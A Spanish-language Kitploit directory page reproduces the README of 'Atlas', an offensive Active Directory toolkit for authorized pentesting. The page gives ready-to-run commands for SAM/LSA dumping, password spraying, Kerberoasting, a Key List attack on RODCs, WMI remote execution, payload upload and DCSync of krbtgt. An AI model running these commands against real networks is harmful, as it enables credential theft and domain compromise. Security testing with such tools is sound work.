Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Atlas — Herramienta de ejecución de red multiplataforma (SMB/Kerberos/WMI/LDAP/DCSync) construida sobre Titanis de TrustedSec: flujo de trabajo estilo NetExec en C# | Kitploit
Herramientas/GitHubGitHub/portbuster1337/atlas
ReconocimientoExplotaciónMovimiento LateralPost-ExplotaciónSeguridad de RedesPruebas de PenetraciónRed Teaming
GitHubportbuster1337/atlas

Atlas

Herramienta de ejecución de red multiplataforma (SMB/Kerberos/WMI/LDAP/DCSync) construida sobre Titanis de TrustedSec: flujo de trabajo estilo NetExec en C#

Ver Repositorio
48413hace 3 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Atlas

Atlas es un kit de herramientas multiplataforma (Windows/Linux) de ejecución en red y evaluación de seguridad construido sobre la biblioteca de protocolos Titanis de TrustedSec. Está inspirado en el flujo de trabajo de NetExec/CrackMapExec: listas de objetivos, conjuntos de credenciales, enumeración modular y salida de consola compacta [HH:mm:ss] [+] host - mensaje.

Esta herramienta está destinada a pruebas de seguridad autorizadas. Úsala únicamente contra sistemas para los que tengas permiso explícito de prueba.

Características

ProtocoloCapacidades
smbVerificación de autenticación (NTLM/Kerberos/anónimo), recursos compartidos, usuarios, grupos, discos, sesiones vía RPC SRVS/SAMR; volcado de secretos SAM y LSA vía Registro Remoto; listado de directorios, get/put/mkdir/rm sobre SMB2/3
kerberosEnumeración de usuarios (clasificación AS-REQ), detección de pre-auth / AS-REP roastable, Kerberoasting con salida en formato hashcat, ataque Key List contra RODCs
wmiVerificación de autenticación vía DCOM/WMI, ejecución remota de comandos vía Win32_Process.Create
ldapVerificación de autenticación (bind simple SASL o RFC 4511), consultas paginadas de subárbol con selección de atributos
dcsyncReplicar material de credenciales desde un DC vía [MS-DRSR] (IDL_DRSGetNCChanges + EXOP_REPL_OBJ)

Módulos

Compartido entre todos los protocolos:

  • Especificación de objetivos: host/IP único, CIDR, rangos (a.b.c.d-e), listas separadas por comas, @file
  • Matriz de autenticación completa heredada de Titanis: contraseñas, hashes NT, claves AES, keytabs, tickets .kirbi/.ccache, certificados PKINIT, S4U, anulaciones de SPN, SOCKS5
  • Distribución multi-host con concurrencia configurable y tiempo de espera por host
  • Salida de consola estilo NetExec

Requisitos

  • .NET SDK 9.0+ (algunos proyectos Titanis incluidos usan C# 13)
  • Accesibilidad de red a los objetivos (445/TCP para SMB, 88/TCP para Kerberos, 389/TCP para LDAP, 135/TCP + puertos RPC dinámicos para WMI/DCSync)

Compilación

El repositorio incluye el código fuente de Titanis bajo external/Titanis y lo compila como parte de la solución.

root@kitploit:~
git clone https://github.com/<your-account>/atlas.git
cd atlas
dotnet build Atlas.sln -p:NoWarn=CS1998

El binario resultante es una aplicación .NET dependiente del framework:

root@kitploit:~
dotnet src/Atlas.Cli/bin/Debug/net8.0/atlas.dll --help

Uso

root@kitploit:~
atlas <protocol> <targets> [authentication] [actions] [options]

La especificación de objetivos acepta cualquier combinación de: HOST, 10.0.0.5, 192.168.1.0/24, 10.0.0.1-64, listas separadas por comas o @targets.txt.

SMB

root@kitploit:~
# Solo verificación de credenciales
atlas smb 10.0.0.5 -u administrator -p 'Password1!'

# Enumeración
atlas smb 10.0.0.0/24 -u admin -p 'Password1!' -Shares -Users -Groups -Disks -Sessions

# Volcado de SAM / LSA (requiere administrador local)
atlas smb 10.0.0.5 -u admin -p 'Password1!' -Sam -Lsa

# Operaciones de archivos
atlas smb 10.0.0.5 -u admin -p pass -LsPath 'C$\Users'
atlas smb 10.0.0.5 -u admin -p pass -GetFile 'C$\Windows\win.ini'
atlas smb 10.0.0.5 -u admin -p pass -PutSource ./payload.bin -PutDest 'C$\Temp\payload.bin'

# Módulos
atlas smb 10.0.0.0/24 -u admin -p pass -M spider -mo 'depth=3,maxfiles=50,match=.conf'
atlas smb 10.0.0.0/24 -u admin -p pass -M shareaccess
atlas smb 10.0.0.5 -u admin -p pass -M localadmins

# Pulverización de contraseñas
atlas smb 10.0.0.0/24 -UserList users.txt -PassList 'Password1!,Summer2024!'

Kerberos

root@kitploit:~
# Enumeración de usuarios (no requiere credenciales)
atlas kerberos dc01.corp.local -d CORP.LOCAL -UserList users.txt

# Kerberoasting (requiere cualquier credencial de dominio)
atlas kerberos dc01.corp.local -d CORP.LOCAL -Roast -u lowpriv -p 'Password1!'
atlas kerberos dc01.corp.local -d CORP.LOCAL -Roast -u lowpriv -p pass -SpnList 'MSSQLSvc/sql01.corp.local:1433'

# Ataque Key List contra un RODC
atlas kerberos rodc01.corp.local -d CORP.LOCAL -rodcNo 20000 -rodcKey <aes256-hex> -UserList 'jdoe:1104'

WMI

root@kitploit:~
atlas wmi dc01.corp.local -d CORP.LOCAL -u admin -p pass           # verificación de autenticación
atlas wmi dc01.corp.local -d CORP.LOCAL -u admin -p pass -x whoami # ejecución

LDAP

root@kitploit:~
# Bind SASL (NTLM/Kerberos) - típico contra Active Directory
atlas ldap dc01.corp.local -d CORP.LOCAL -u user -p pass -Query '(adminCount=1)' -Attrs sAMAccountName

# Bind simple RFC 4511 - típico contra OpenLDAP
atlas ldap ldap.example.com -bd 'cn=admin,dc=example,dc=com' -bp password \
    -Query '(objectClass=*)' -Base 'dc=example,dc=com'

DCSync

root@kitploit:~
atlas dcsync dc01.corp.local -d CORP.LOCAL -u admin -p pass krbtgt
atlas dcsync dc01.corp.local -d CORP.LOCAL -u admin -p pass jdoe '(adminCount=1)'

Opciones de autenticación (todos los protocolos)

Ejecuta atlas <protocol> -h para la referencia completa de parámetros.

Estructura del repositorio

root@kitploit:~
Atlas.sln
Directory.Build.props      No-op intencional (ver nota)
src/
  Atlas.props              Configuración de compilación compartida (importada explícitamente por los proyectos Atlas)
  Atlas.Core/              Análisis de objetivos, salida de consola, registro de módulos
  Atlas.Protocols.Smb/     Host SMB + módulos
  Atlas.Protocols.Kerberos/ Enumeración AS-REQ, roasting, ataque Key List
  Atlas.Protocols.Wmi/     Host WMI/DCOM
  Atlas.Protocols.Ldap/    Host LDAP
  Atlas.Protocols.Drsr/    DCSync
  Atlas.Cli/               Punto de entrada / despachador de protocolos
external/Titanis/          Código fuente de Titanis incluido (compilado desde fuente; no en NuGet)

Nota: Directory.Build.props en la raíz del repositorio está intencionalmente vacío. La compilación de Titanis importa $(SolutionDir)Directory.Build.props; el archivo debe existir al compilar desde esta solución pero debe permanecer vacío para que la configuración ascendente no se filtre al árbol incluido.

Licencia

Este proyecto enlaza y distribuye código fuente de Titanis de TrustedSec, que está licenciado bajo GPL-3.0. En consecuencia, este proyecto se distribuye bajo GPL-3.0. Ver external/Titanis/LICENSE.

Descargar herramienta
MóduloProtocoloDescripción
spidersmbRastreador recursivo de recursos compartidos (opciones depth, maxfiles, match)
shareaccesssmbVerificación de acceso READ/WRITE por recurso compartido
localadminssmbMiembros del grupo Administradores local vía SAMR, nombres resueltos a través de LSA
OpciónSignificado
-u, -UserNameNombre de usuario (user, DOMAIN\user o user@realm)
-p, -PasswordContraseña
-NtlmHashHash NT (NTLM + Kerberos RC4)
-AesKeyClave Kerberos AES128/AES256
-KdcEndpoint KDC para Kerberos
-Tgt / -TicketCache / -TicketsEntrada de tickets .kirbi / .ccache
-KeytabArchivo keytab
-UserCert (+-UserKey)Autenticación con certificado PKINIT
-AnonymousSesión nula
-haAnulación de dirección de host (usa FQDN en la posición de objetivo + IP aquí para SPNs correctos)